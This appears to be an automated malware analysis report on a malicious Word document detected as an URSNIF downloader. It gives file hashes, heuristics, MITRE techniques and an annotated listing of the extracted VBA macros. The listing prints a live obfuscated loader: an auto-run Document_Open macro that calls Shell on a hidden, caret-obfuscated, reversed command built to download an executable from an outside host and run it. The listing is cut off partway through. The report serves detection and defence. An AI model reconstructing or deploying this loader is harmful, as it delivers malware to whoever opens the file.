Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 069d3539af0e666c…

MALICIOUS

Office (OLE)

61.6 KB Created: 2018-09-10 06:34:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 306c0b839edc88c2e427a9967b14f72f SHA-1: 88a7cab16fc7ec9390b8bed6c44026d3f6432229 SHA-256: 069d3539af0e666ce2a74b210f3dbc77635bbf5c381a290716cf7c2c264f5acb
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that invokes the Shell() function. This indicates an attempt to execute arbitrary code on document open, most likely to download and run a secondary payload. The ClamAV detection 'Doc.Downloader.URSNIF-6729855-3' further supports its role as a downloader.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5021 bytes
SHA-256: 56309a67e1cffa5d49e548f36275f9c61a12663a85cf2e3265258643df08abe0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jsiQIziN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word executes this procedure when the document is opened
' (report heuristic OLE_VBA_DOCOPEN). Lives in the "jsiQIziN" module (ThisDocument-based).
Private Sub Document_open()
' "On Error Resume Next" written across four line-continuation lines; every runtime
' error raised below (including a failed Shell) is silently swallowed. Do not place
' comments between the continuation lines — they would break the statement.
On _
Error _
Resume _
Next
   ' Calls to a procedure named "Second" with concatenated string literals as the
   ' argument. "Second" is not defined anywhere in the visible listing; presumably
   ' these are padding/junk calls whose failure is masked by the handler above —
   ' confirm against the full macro dump.
   Second "KRfd" + "FHnW"
   Second "UE" + "iaswH" + "3087" + "G"
   Second "308763403" + "GBiuQ" + "r" + "883"
   Second "126739102" + "pUVfXYtAO" + "7689" + "446489022"
   Second "iFzFiMN" + "zlpYp" + "fSRF" + "ljz"
' The operative line (report heuristic OLE_VBA_SHELL): runs Shell on a command string
' built at runtime from CfcSWjic (a Function in the "ciLujYs" module that concatenates
' caret-laden string fragments) plus CDTUZ (not present in this excerpt), with window
' style CStr(vbHide) so no console window is shown. Detection/response focus: Word
' spawning a child process immediately after document open.
Shell CfcSWjic + CDTUZ, CStr(vbHide)
   ' Further "Second" calls — same pattern as above, no visible effect.
   Second "2347" + "262287524"
   Second "G" + "uHBFKQiVT" + "FkASp" + "AzdslDLFNnC"
   Second "sIWizlKP" + "6366" + "369796046" + "T"
   Second "7437" + "kX"
   Second "U" + "155175130"
End Sub



Attribute VB_Name = "ciLujYs"
Function CfcSWjic()

On _
Error _
Resume _
Next
Second "311218274" + "LCt" + "4534" + "123237466"
   Second "OEUKjAtaA" + "FiWv"
UEQkX = Format(Chr(7 + 3 + 16 + 6 + 67)) + "md /" + "V^" + ":^O/" + Format(Chr(5 + 2 + 11 + 4 + 45)) + Format(Chr(2 + 1 + 5 + 2 + 24)) + "^s" + "e^t ^0B" + "="
Second "j" + "365694501" + "97987281" + "520593960"
   Second "6084" + "f" + "ZhKZi" + "79090721"
   Second "Lu" + "4169"
   Second "kTPXbpK" + "ItQGJjKqHj"
   Second "8754" + "ozjq" + "JSGizZnl" + "EiTqbJr"
wPHdW = "^  ^" + " ^ ^ ^" + " ^ ^   " + " " + "  ^ " + "^ ^ ^ }" + "^}{h" + Format(Chr(7 + 3 + 16 + 6 + 67)) + "^t" + "^a" + Format(Chr(7 + 3 + 16 + 6 + 67)) + "}^;^k" + "a^erb" + ";v"
Second "KnCSJjDdfsAzNv" + "oP" + "726" + "6432"
   Second "s" + "250634768" + "186887987" + "lFwOEcXWt"
   Second "128361133" + "bH"
HNlvmkQYcb = "M^U^" + "$ ^m" + "^e" + "tI-^e" + "^kov" + "n" + "I" + "^;)v"
Second "jadFXolGzzhd" + "k" + "oE" + "hEDEDjH"
   Second "AkwzAIX" + "c" + "6948" + "qNRNI"
   Second "62708528" + "QwV"
nIrNSBZ = "M^U^$ " + ",^" + "w^XQ$(" + "^el^i^F" + "da" + "^" + "o" + "^ln" + "^w^o^" + "D" + "^.^Y"
Second "MjjiG" + "scNcmF" + "4103" + "IXN"
   Second "lDkWBzhVi" + "bZOLQrv" + "3140" + "8701"
   Second "165344600" + "zzLX" + "siwFjqq" + "256264407"
   Second "qOu" + "FM" + "3393" + "204379887"
   Second "srXv" + "LXnbncW"
TtkanXwvzS = "j^D${" + "yrt{)" + "wKz^$" + " ni^" + " " + "^w" + "XQ^$" + "(^h" + Format(Chr(7 + 3 + 16 + 6 + 67)) + "ae" + "r^o^f"
Second "nHniS" + "wsb"
   Second "410861260" + "9330"
   Second "irhPlNmQo" + "8969" + "rEKM" + "lX"
   Second "74069496" + "WU" + "514922955" + "uqVGVjCP"
ZRRknsHv = ";^" + "'e^" + "xe.'" + "+^" + "sm^h$" + "^+^'^\" + "'+" + Format(Chr(7 + 3 + 16 + 6 + 67)) + "^il" + "^bu^p^:" + "vn" + "^e" + "^$"
Second "wiGjrDlLtMziR" + "9029" + "FpuIOH" + "ULoTcHT"
   Second "jlzXrJ" + "430324792"
KGQQEUoJj = "=vMU$" + "^;'^0" + "1" + "7^'^ ^=" + "^ ^sm" + "h$;)'^" + "@^'(t^" + "i" + "^lp" + "^S^." + "^'n" + "k^" + "t^."
Second "H" + "7047" + "PWmz" + "iqDCf"
   Second "cwDj" + "6921" + "2384" + "351288555"
BKdAd = "^" + "4g^m" + "^o^=^l?" + "p^h^p^." + "^" + "t^o" + "^ksn^a^" + "p^o/^"
Second "4061" + "428217386" + "RMPvRA" + "u"
   Second "NAw" + "nQzlAVw"
   Second "uTG" + "513277977"
cSjRv = "TTR/^mo" + Format(Chr(7 + 3 + 16 + 6 + 67)) + "^." + Format(Chr(7 + 3 + 16 + 6 + 67)) + "^x^" + "zy^t^" + "e^egh^" + "y^y" + "^snai^" + "oo//:" + "^p" + "^t^" + "th'^"
Second "zEpjub" + "EmuU"
   Second "EnAMi" + "16330789" + "504556870" + "7770"
pPvWSzPjHi = "=^w" + "Kz^$;t" + "n^e" + "i^l" + Format(Chr(5 + 2 + 11 + 4 + 45)) + "b^e" + "^"
Second "4896" + "hFGW"
   Second "CjVp" + "39440823"
dlGIPPZKr = "W^.t" + "^eN^" + " t" + Format(Chr(7 + 3 + 16 + 6 + 67)) + "^" + "e^j" + "^b^o-^" + "wen" + "^=Y^jD" + "$" + "^ ^ll^e" + "^h" + "sr" + "ew"
Second "D" + "XPl" + "1736" + "194586901"
   Second "588" + "hOa" + "230445417" + "148275373"
   Second "28877561" + "zTaLlcalDHUD" + "Fd" + "328349463"
   Second "U" + "851"
   Second "rdArMoEQwGFs" + "495287311"
XIsawU = "^" + "op&&for" + " /^L %r" + " ^in (" + "^2^6^6" + ",^" + "-1,0" + ")d^o s" + "^e^t ^" + "XR^b"
CfcSWjic = UEQkX + wPHdW + HNlvmkQYcb + nIrNSBZ + TtkanXwvzS + ZRR
... (truncated)